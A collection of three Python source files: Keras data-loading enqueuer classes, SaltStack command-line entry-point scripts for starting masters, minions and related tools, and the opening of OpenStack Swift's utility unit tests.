self.executor_fn = lambda _: get_pool_class(False)(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _send_sequence(self):
"""Sends current Iterable to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
Args:
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
def __del__(self):
if self.is_running():
self.stop()
@abstractmethod
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
raise NotImplementedError
@abstractmethod
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Returns:
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
@keras_export('keras.utils.OrderedEnqueuer')
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Args:
sequence: A `tf.keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
self.shuffle = shuffle
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
def pool_fn(seqs):
pool = get_pool_class(True)(
workers, initializer=init_pool_generator,
initargs=(seqs, None, get_worker_id_queue()))
_DATA_POOLS.add(pool)
return pool
return pool_fn
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
while self.is_running():
try:
inputs = self.queue.get(block=True, timeout=5).get()
if self.is_running():
self.queue.task_done()
if inputs is not None:
yield inputs
except queue.Empty:
pass
except Exception as e: # pylint: disable=broad-except
self.stop()
raise e
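# Illustrative usage sketch (assumed, not from the original file; `my_sequence`
# is any `Sequence` implementation such as the CIFAR10Sequence example above):
#
#   enqueuer = OrderedEnqueuer(my_sequence, use_multiprocessing=False, shuffle=True)
#   enqueuer.start(workers=2, max_queue_size=10)
#   batches = enqueuer.get()      # generator of (inputs, targets[, sample_weights])
#   for _ in range(len(my_sequence)):
#       x, y = next(batches)
#   enqueuer.stop()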
def init_pool_generator(gens, random_seed=None, id_queue=None):
"""Initializer function for pool workers.
Args:
gens: State which should be made available to worker processes.
random_seed: An optional value with which to seed child processes.
id_queue: A multiprocessing Queue of worker ids. This is used to indicate
that a worker process was created by Keras and can be terminated using
the cleanup_all_keras_forkpools utility.
"""
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = gens
worker_proc = multiprocessing.current_process()
# name isn't used for anything, but setting a more descriptive name is helpful
# when diagnosing orphaned processes.
worker_proc.name = 'Keras_worker_{}'.format(worker_proc.name)
if random_seed is not None:
np.random.seed(random_seed + worker_proc.ident)
if id_queue is not None:
# If a worker dies during init, the pool will just create a replacement.
id_queue.put(worker_proc.ident, block=True, timeout=0.1)
def next_sample(uid):
"""Gets the next value from the generator `uid`.
To allow multiple generators to be used at the same time, we use `uid` to
get a specific one. A single generator would cause the validation to
overwrite the training generator.
Args:
uid: int, generator identifier
Returns:
The next value of generator `uid`.
"""
return next(_SHARED_SEQUENCES[uid])
@keras_export('keras.utils.GeneratorEnqueuer')
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite in which case the class will throw
a `StopIteration` exception.
Args:
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
random_seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self, generator,
use_multiprocessing=False,
random_seed=None):
super(GeneratorEnqueuer, self).__init__(generator, use_multiprocessing)
self.random_seed = random_seed
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
A Function to initialize the pool
"""
def pool_fn(seqs):
pool = get_pool_class(True)(
workers, initializer=init_pool_generator,
initargs=(seqs, self.random_seed, get_worker_id_queue()))
_DATA_POOLS.add(pool)
return pool
return pool_fn
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
self._send_sequence() # Share the initial generator
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
while True:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(next_sample, (self.uid,)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except StopIteration:
# Special case for finite generators
last_ones = []
while self.queue.qsize() > 0:
last_ones.append(self.queue.get(block=True))
# Wait for them to complete
for f in last_ones:
f.wait()
# Keep the good ones
last_ones = [future.get() for future in last_ones if future.successful()]
for inputs in last_ones:
if inputs is not None:
yield inputs
except Exception as e: # pylint: disable=broad-except
self.stop()
if 'generator already executing' in str(e):
raise RuntimeError(
'Your generator is NOT thread-safe. '
'Keras requires a thread-safe generator when '
'`use_multiprocessing=False, workers > 1`. ')
raise e
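# Illustrative usage sketch (assumed, not from the original file): feeding a plain
# generator through a GeneratorEnqueuer. With threads (`use_multiprocessing=False`)
# and more than one worker, the generator itself must be thread-safe, e.g. by
# decorating it with `threadsafe_generator` defined above.
#
#   @threadsafe_generator
#   def sample_stream():
#       while True:
#           yield np.zeros((32, 10)), np.zeros((32, 1))
#
#   enqueuer = GeneratorEnqueuer(sample_stream(), use_multiprocessing=False)
#   enqueuer.start(workers=2, max_queue_size=10)
#   batches = enqueuer.get()
#   x, y = next(batches)
#   enqueuer.stop()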
|
scripts.py
|
# -*- coding: utf-8 -*-
'''
This module contains the function calls to execute command line scripts
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import sys
import time
import signal
import logging
import functools
import threading
import traceback
from random import randint
# Import salt libs
from salt.exceptions import SaltSystemExit, SaltClientError, SaltReqTimeoutError
import salt.defaults.exitcodes # pylint: disable=unused-import
import salt.ext.six as six
log = logging.getLogger(__name__)
def _handle_interrupt(exc, original_exc, hardfail=False, trace=''):
'''
If hardfailing:
    if we got the original stacktrace, log it;
    in all cases, raise the original exception,
    since this is logically part of the initial stack.
Otherwise just let salt exit gracefully.
'''
if hardfail:
if trace:
log.error(trace)
raise original_exc
else:
raise exc
def _handle_signals(client, signum, sigframe):
try:
# This raises AttributeError on Python 3.4 and 3.5 if there is no current exception.
# Ref: https://bugs.python.org/issue23003
trace = traceback.format_exc()
except AttributeError:
trace = ''
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
if signum == signal.SIGINT:
exit_msg = '\nExiting gracefully on Ctrl-c'
try:
jid = client.local_client.pub_data['jid']
exit_msg += (
'\n'
'This job\'s jid is: {0}\n'
'The minions may not have all finished running and any remaining '
'minions will return upon completion. To look up the return data '
'for this job later, run the following command:\n\n'
'salt-run jobs.lookup_jid {0}'.format(jid)
)
except (AttributeError, KeyError):
pass
else:
exit_msg = None
_handle_interrupt(
SystemExit(exit_msg),
Exception('\nExiting with hard crash on Ctrl-c'),
hardcrash, trace=trace)
def _install_signal_handlers(client):
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, functools.partial(_handle_signals, client))
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, functools.partial(_handle_signals, client))
def salt_master():
'''
Start the salt master.
'''
import salt.cli.daemons
# Fix for setuptools generated scripts, so that it will
# work with multiprocessing fork emulation.
# (see multiprocessing.forking.get_preparation_data())
if __name__ != '__main__':
sys.modules['__main__'] = sys.modules[__name__]
# REMOVEME after Python 2.7 support is dropped (also the six import)
if six.PY2:
from salt.utils.versions import warn_until
# Message borrowed from pip's deprecation warning
warn_until('Sodium',
'Python 2.7 will reach the end of its life on January 1st,'
' 2020. Please upgrade your Python as Python 2.7 won\'t be'
' maintained after that date. Salt will drop support for'
' Python 2.7 in the Sodium release or later.')
# END REMOVEME
master = salt.cli.daemons.Master()
master.start()
def minion_process():
'''
Start a minion process
'''
import salt.utils.platform
import salt.utils.process
import salt.cli.daemons
# salt_minion spawns this function in a new process
salt.utils.process.appendproctitle('KeepAlive')
def handle_hup(manager, sig, frame):
manager.minion.reload()
lock = threading.RLock()
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
NOTE: there is a small race issue where the parent PID could be replaced
with another process with the same PID!
'''
while lock.acquire(blocking=False):
lock.release()
time.sleep(5)
try:
# check pid alive (Unix only trick!)
if os.getuid() == 0 and not salt.utils.platform.is_windows():
os.kill(parent_pid, 0)
except OSError as exc:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
log.error('Minion process encountered exception: %s', exc)
os._exit(salt.defaults.exitcodes.EX_GENERIC)
try:
if not salt.utils.platform.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
minion = salt.cli.daemons.Minion()
signal.signal(signal.SIGHUP,
functools.partial(handle_hup,
minion))
minion.start()
except (SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
lock.acquire(blocking=True)
log.warning('Fatal functionality error caught by minion handler:\n', exc_info=True)
log.warning('** Restarting minion **')
delay = 60
if minion is not None and hasattr(minion, 'config'):
delay = minion.config.get('random_reauth_delay', 60)
delay = randint(1, delay)
log.info('waiting random_reauth_delay %ss', delay)
time.sleep(delay)
sys.exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
finally:
lock.acquire(blocking=True)
def salt_minion():
'''
Start the salt minion in a subprocess.
Auto restart minion on error.
'''
import signal
import salt.utils.platform
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
import multiprocessing
# Fix for setuptools generated scripts, so that it will
# work with multiprocessing fork emulation.
# (see multiprocessing.forking.get_preparation_data())
if __name__ != '__main__':
sys.modules['__main__'] = sys.modules[__name__]
if '' in sys.path:
sys.path.remove('')
if salt.utils.platform.is_windows():
minion = salt.cli.daemons.Minion()
minion.start()
return
# REMOVEME after Python 2.7 support is dropped (also the six import)
elif six.PY2:
from salt.utils.versions import warn_until
# Message borrowed from pip's deprecation warning
warn_until('Sodium',
'Python 2.7 will reach the end of its life on January 1st,'
' 2020. Please upgrade your Python as Python 2.7 won\'t be'
' maintained after that date. Salt will drop support for'
' Python 2.7 in the Sodium release or later.')
# END REMOVEME
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
minion = salt.cli.daemons.Minion()
minion.start()
return
def escalate_signal_to_process(pid, signum, sigframe): # pylint: disable=unused-argument
'''
Escalate the signal received to the multiprocessing process that
is actually running the minion
'''
# escalate signal
os.kill(pid, signum)
# keep one minion subprocess running
prev_sigint_handler = signal.getsignal(signal.SIGINT)
prev_sigterm_handler = signal.getsignal(signal.SIGTERM)
while True:
try:
process = multiprocessing.Process(target=minion_process)
process.start()
signal.signal(signal.SIGTERM,
functools.partial(escalate_signal_to_process,
process.pid))
signal.signal(signal.SIGINT,
functools.partial(escalate_signal_to_process,
process.pid))
signal.signal(signal.SIGHUP,
functools.partial(escalate_signal_to_process,
process.pid))
except Exception: # pylint: disable=broad-except
# if multiprocessing does not work
minion = salt.cli.daemons.Minion()
minion.start()
break
process.join()
# Process exited or was terminated. Since we're going to try to restart
# it, we MUST reset signal handling to the previous handlers
signal.signal(signal.SIGINT, prev_sigint_handler)
signal.signal(signal.SIGTERM, prev_sigterm_handler)
if not process.exitcode == salt.defaults.exitcodes.SALT_KEEPALIVE:
sys.exit(process.exitcode)
# on top of the random_reauth_delay already performed
# delay extra to reduce flooding and free resources
# NOTE: values are static but should be fine.
time.sleep(2 + randint(1, 10))
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def proxy_minion_process(queue):
'''
Start a proxy minion process
'''
import salt.cli.daemons
import salt.utils.platform
# salt_minion spawns this function in a new process
lock = threading.RLock()
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
NOTE: there is a small race issue where the parent PID could be replaced
with another process with the same PID!
'''
while lock.acquire(blocking=False):
lock.release()
time.sleep(5)
try:
# check pid alive (Unix only trick!)
os.kill(parent_pid, 0)
except OSError:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
os._exit(999)
try:
if not salt.utils.platform.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
restart = False
proxyminion = None
status = salt.defaults.exitcodes.EX_OK
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc: # pylint: disable=broad-except
log.error('Proxy Minion failed to start: ', exc_info=True)
restart = True
# status is superfluous since the process will be restarted
status = salt.defaults.exitcodes.SALT_KEEPALIVE
except SystemExit as exc:
restart = False
status = exc.code
finally:
lock.acquire(blocking=True)
if restart is True:
log.warning('** Restarting proxy minion **')
delay = 60
if proxyminion is not None:
if hasattr(proxyminion, 'config'):
delay = proxyminion.config.get('random_reauth_delay', 60)
random_delay = randint(1, delay)
log.info('Sleeping random_reauth_delay of %s seconds', random_delay)
# perform the delay after minion resources have been cleaned
queue.put(random_delay)
else:
queue.put(0)
sys.exit(status)
def salt_proxy():
'''
Start a proxy minion.
'''
import salt.cli.daemons
import salt.utils.platform
import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.platform.is_windows():
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
# keep one minion subprocess running
while True:
try:
queue = multiprocessing.Queue()
except Exception: # pylint: disable=broad-except
# This breaks in containers
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
process = multiprocessing.Process(target=proxy_minion_process, args=(queue,))
process.start()
try:
process.join()
try:
restart_delay = queue.get(block=False)
except Exception: # pylint: disable=broad-except
if process.exitcode == 0:
# Minion process ended naturally, Ctrl+C or --version
break
restart_delay = 60
if restart_delay == 0:
# Minion process ended naturally, Ctrl+C, --version, etc.
sys.exit(process.exitcode)
# delay restart to reduce flooding and allow network resources to close
time.sleep(restart_delay)
except KeyboardInterrupt:
break
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def salt_syndic():
'''
Start the salt syndic.
'''
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
pid = os.getpid()
try:
syndic = salt.cli.daemons.Syndic()
syndic.start()
except KeyboardInterrupt:
os.kill(pid, 15)
def salt_key():
'''
Manage the authentication keys with salt-key.
'''
import salt.cli.key
try:
client = salt.cli.key.SaltKey()
_install_signal_handlers(client)
client.run()
except Exception as err: # pylint: disable=broad-except
sys.stderr.write("Error: {0}\n".format(err))
def salt_cp():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.cp
client = salt.cli.cp.SaltCPCli()
_install_signal_handlers(client)
client.run()
def salt_call():
'''
Directly call a salt command in the modules, does not require a running
salt minion to run.
'''
import salt.cli.call
if '' in sys.path:
sys.path.remove('')
client = salt.cli.call.SaltCall()
_install_signal_handlers(client)
client.run()
def salt_run():
'''
Execute a salt convenience routine.
'''
import salt.cli.run
if '' in sys.path:
sys.path.remove('')
client = salt.cli.run.SaltRun()
_install_signal_handlers(client)
client.run()
def salt_ssh():
'''
Execute the salt-ssh system
'''
import salt.cli.ssh
if '' in sys.path:
sys.path.remove('')
try:
client = salt.cli.ssh.SaltSSH()
_install_signal_handlers(client)
client.run()
except SaltClientError as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit(err),
err,
hardcrash, trace=trace)
def salt_cloud():
'''
The main function for salt-cloud
'''
# Define 'salt' global so we may use it after ImportError. Otherwise,
# UnboundLocalError will be raised.
global salt # pylint: disable=W0602
try:
# Late-imports for CLI performance
import salt.cloud
import salt.cloud.cli
except ImportError as e:
# No salt cloud on Windows
log.error('Error importing salt cloud: %s', e)
print('salt-cloud is not available in this system')
sys.exit(salt.defaults.exitcodes.EX_UNAVAILABLE)
if '' in sys.path:
sys.path.remove('')
client = salt.cloud.cli.SaltCloud()
_install_signal_handlers(client)
client.run()
def salt_api():
'''
The main function for salt-api
'''
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.api
sapi = salt.cli.api.SaltAPI() # pylint: disable=E1120
sapi.start()
def salt_main():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.salt
if '' in sys.path:
sys.path.remove('')
client = salt.cli.salt.SaltCMD()
_install_signal_handlers(client)
client.run()
def salt_spm():
'''
The main function for spm, the Salt Package Manager
.. versionadded:: 2015.8.0
'''
import salt.cli.spm
spm = salt.cli.spm.SPM() # pylint: disable=E1120
spm.run()
def salt_extend(extension, name, description, salt_dir, merge):
'''
Quickstart for developing on the saltstack installation
.. versionadded:: 2016.11.0
'''
import salt.utils.extend
salt.utils.extend.run(extension=extension,
name=name,
description=description,
salt_dir=salt_dir,
merge=merge)
def salt_unity():
'''
Change the args and redirect to another salt script
'''
avail = []
for fun in dir(sys.modules[__name__]):
if fun.startswith('salt'):
avail.append(fun[5:])
if len(sys.argv) < 2:
msg = 'Must pass in a salt command, available commands are:'
for cmd in avail:
msg += '\n{0}'.format(cmd)
print(msg)
sys.exit(1)
cmd = sys.argv[1]
if cmd not in avail:
# Fall back to the salt command
sys.argv[0] = 'salt'
s_fun = salt_main
else:
sys.argv[0] = 'salt-{0}'.format(cmd)
sys.argv.pop(1)
s_fun = getattr(sys.modules[__name__], 'salt_{0}'.format(cmd))
s_fun()
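# Illustrative invocations (assumed, not from the original file):
#
#   salt-unity key -L          # argv becomes ['salt-key', '-L'] and salt_key() runs
#   salt-unity '*' test.ping   # '*' is not a known sub-command, so argv[0] is set to
#                              # 'salt' and salt_main() handles it as a plain salt call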
|
test_utils.py
|
# Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.common.utils"""
from __future__ import with_statement
from test.unit import temptree
import ctypes
import errno
import eventlet
import logging
import os
import random
import re
import socket
import sys
from textwrap import dedent
import tempfile
import threading
import time
import unittest
import fcntl
import shutil
from contextlib import nested
from Queue import Queue, Empty
from getpass import getuser
from shutil import rmtree
from StringIO import StringIO
from functools import partial
from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp
from netifaces import AF_INET6
from mock import MagicMock, patch
from swift.common.exceptions import (Timeout, MessageTimeout,
ConnectionTimeout, LockTimeout)
from swift.common import utils
from swift.common.swob import Response
from test.unit import FakeLogger
class MockOs():
def __init__(self, pass_funcs=[], called_funcs=[], raise_funcs=[]):
self.closed_fds = []
for func in pass_funcs:
setattr(self, func, self.pass_func)
self.called_funcs = {}
for func in called_funcs:
c_func = partial(self.called_func, func)
setattr(self, func, c_func)
for func in raise_funcs:
r_func = partial(self.raise_func, func)
setattr(self, func, r_func)
def pass_func(self, *args, **kwargs):
pass
setgroups = chdir = setsid = setgid = setuid = umask = pass_func
def called_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
def raise_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
raise OSError()
def dup2(self, source, target):
self.closed_fds.append(target)
def geteuid(self):
'''Pretend we are running as root.'''
return 0
def __getattr__(self, name):
# I only over-ride portions of the os module
try:
return object.__getattr__(self, name)
except AttributeError:
return getattr(os, name)
class MockUdpSocket():
def __init__(self):
self.sent = []
def sendto(self, data, target):
self.sent.append((data, target))
def close(self):
pass
class MockSys():
def __init__(self):
self.stdin = TemporaryFile('w')
self.stdout = TemporaryFile('r')
self.stderr = TemporaryFile('r')
self.__stderr__ = self.stderr
self.stdio_fds = [self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()]
def reset_loggers():
if hasattr(utils.get_logger, 'handler4logger'):
for logger, handler in utils.get_logger.handler4logger.items():
logger.thread_locals = (None, None)
logger.removeHandler(handler)
delattr(utils.get_logger, 'handler4logger')
if hasattr(utils.get_logger, 'console_handler4logger'):
for logger, h in utils.get_logger.console_handler4logger.items():
logger.thread_locals = (None, None)
logger.removeHandler(h)
delattr(utils.get_logger, 'console_handler4logger')
class TestUtils(unittest.TestCase):
"""Tests for swift.common.utils """
def test_backwards(self):
# Test swift.common.utils.backward
# The lines are designed so that the function would encounter
# all of the boundary conditions and typical conditions.
# Block boundaries are marked with '<>' characters
blocksize = 25
lines = ['123456789x12345678><123456789\n', # block larger than rest
'123456789x123>\n', # block ends just before \n character
'123423456789\n',
'123456789x\n', # block ends at the end of line
'<123456789x123456789x123\n',
'<6789x123\n', # block ends at the beginning of the line
'6789x1234\n',
'1234><234\n', # block ends typically in the middle of line
'123456789x123456789\n']
with TemporaryFile('r+w') as f:
for line in lines:
f.write(line)
count = len(lines) - 1
for line in utils.backward(f, blocksize):
self.assertEquals(line, lines[count].split('\n')[0])
count -= 1
# Empty file case
with TemporaryFile('r') as f:
self.assertEquals([], list(utils.backward(f)))
def test_mkdirs(self):
testroot = os.path.join(os.path.dirname(__file__), 'mkdirs')
try:
os.unlink(testroot)
except Exception:
pass
rmtree(testroot, ignore_errors=1)
self.assert_(not os.path.exists(testroot))
utils.mkdirs(testroot)
self.assert_(os.path.exists(testroot))
utils.mkdirs(testroot)
self.assert_(os.path.exists(testroot))
rmtree(testroot, ignore_errors=1)
testdir = os.path.join(testroot, 'one/two/three')
self.assert_(not os.path.exists(testdir))
utils.mkdirs(testdir)
self.assert_(os.path.exists(testdir))
utils.mkdirs(testdir)
self.assert_(os.path.exists(testdir))
rmtree(testroot, ignore_errors=1)
open(testroot, 'wb').close()
self.assert_(not os.path.exists(testdir))
self.assertRaises(OSError, utils.mkdirs, testdir)
os.unlink(testroot)
def test_split_path(self):
# Test swift.common.utils.split_account_path
self.assertRaises(ValueError, utils.split_path, '')
self.assertRaises(ValueError, utils.split_path, '/')
self.assertRaises(ValueError, utils.split_path, '//')
self.assertEquals(utils.split_path('/a'), ['a'])
self.assertRaises(ValueError, utils.split_path, '//a')
self.assertEquals(utils.split_path('/a/'), ['a'])
self.assertRaises(ValueError, utils.split_path, '/a/c')
self.assertRaises(ValueError, utils.split_path, '//c')
self.assertRaises(ValueError, utils.split_path, '/a/c/')
self.assertRaises(ValueError, utils.split_path, '/a//')
self.assertRaises(ValueError, utils.split_path, '/a', 2)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3, True)
self.assertEquals(utils.split_path('/a/c', 2), ['a', 'c'])
self.assertEquals(utils.split_path('/a/c/o', 3), ['a', 'c', 'o'])
self.assertRaises(ValueError, utils.split_path, '/a/c/o/r', 3, 3)
self.assertEquals(utils.split_path('/a/c/o/r', 3, 3, True),
['a', 'c', 'o/r'])
self.assertEquals(utils.split_path('/a/c', 2, 3, True),
['a', 'c', None])
self.assertRaises(ValueError, utils.split_path, '/a', 5, 4)
self.assertEquals(utils.split_path('/a/c/', 2), ['a', 'c'])
self.assertEquals(utils.split_path('/a/c/', 2, 3), ['a', 'c', ''])
try:
utils.split_path('o\nn e', 2)
except ValueError as err:
self.assertEquals(str(err), 'Invalid path: o%0An%20e')
try:
utils.split_path('o\nn e', 2, 3, True)
except ValueError as err:
self.assertEquals(str(err), 'Invalid path: o%0An%20e')
def test_NullLogger(self):
# Test swift.common.utils.NullLogger
sio = StringIO()
nl = utils.NullLogger()
nl.write('test')
self.assertEquals(sio.getvalue(), '')
def test_LoggerFileObject(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
sio = StringIO()
handler = logging.StreamHandler(sio)
logger = logging.getLogger()
logger.addHandler(handler)
lfo = utils.LoggerFileObject(logger)
print 'test1'
self.assertEquals(sio.getvalue(), '')
sys.stdout = lfo
print 'test2'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\n')
sys.stderr = lfo
print >> sys.stderr, 'test4'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n')
sys.stdout = orig_stdout
print 'test5'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n')
print >> sys.stderr, 'test6'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\n')
sys.stderr = orig_stderr
print 'test8'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\n')
lfo.writelines(['a', 'b', 'c'])
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\n')
lfo.close()
lfo.write('d')
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
lfo.flush()
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assert_(got_exc)
got_exc = False
try:
for line in lfo.xreadlines():
pass
except Exception:
got_exc = True
self.assert_(got_exc)
self.assertRaises(IOError, lfo.read)
self.assertRaises(IOError, lfo.read, 1024)
self.assertRaises(IOError, lfo.readline)
self.assertRaises(IOError, lfo.readline, 1024)
lfo.tell()
def test_parse_options(self):
# Get a file that is definitely on disk
with NamedTemporaryFile() as f:
conf_file = f.name
conf, options = utils.parse_options(test_args=[conf_file])
self.assertEquals(conf, conf_file)
# assert defaults
self.assertEquals(options['verbose'], False)
self.assert_('once' not in options)
# assert verbose as option
conf, options = utils.parse_options(test_args=[conf_file, '-v'])
self.assertEquals(options['verbose'], True)
# check once option
conf, options = utils.parse_options(test_args=[conf_file],
once=True)
self.assertEquals(options['once'], False)
test_args = [conf_file, '--once']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEquals(options['once'], True)
# check options as arg parsing
test_args = [conf_file, 'once', 'plugin_name', 'verbose']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEquals(options['verbose'], True)
self.assertEquals(options['once'], True)
self.assertEquals(options['extra_args'], ['plugin_name'])
def test_parse_options_errors(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
stdo = StringIO()
stde = StringIO()
utils.sys.stdout = stdo
utils.sys.stderr = stde
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[])
self.assert_('missing config' in stdo.getvalue())
# verify conf file must exist, context manager will delete temp file
with NamedTemporaryFile() as f:
conf_file = f.name
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[conf_file])
self.assert_('unable to locate' in stdo.getvalue())
# reset stdio
utils.sys.stdout = orig_stdout
utils.sys.stderr = orig_stderr
def test_get_logger(self):
sio = StringIO()
logger = logging.getLogger('server')
logger.addHandler(logging.StreamHandler(sio))
logger = utils.get_logger(None, 'server', log_route='server')
logger.warn('test1')
self.assertEquals(sio.getvalue(), 'test1\n')
logger.debug('test2')
self.assertEquals(sio.getvalue(), 'test1\n')
logger = utils.get_logger({'log_level': 'DEBUG'}, 'server',
log_route='server')
logger.debug('test3')
self.assertEquals(sio.getvalue(), 'test1\ntest3\n')
# Doesn't really test that the log facility is truly being used all the
# way to syslog; but exercises the code.
logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server',
log_route='server')
logger.warn('test4')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure debug doesn't log by default
logger.debug('test5')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure notice lvl logs by default
logger.notice('test6')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\ntest6\n')
def test_get_logger_sysloghandler_plumbing(self):
